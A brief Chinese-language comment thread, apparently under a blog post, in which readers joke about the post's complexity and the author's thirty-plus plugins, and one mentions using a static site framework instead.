高级,直接一头雾水。只看懂了第一张配图,嗯,不错。
不要在意这些细节,嘻嘻
够狠啊,30个插件!!!
还好,一共四十多个,现在把没启用的都删除了。
像我这种使用静态框架的人,就遇不到这种情况,好烦~
赶紧换啊,体验一下。否则不圆满~~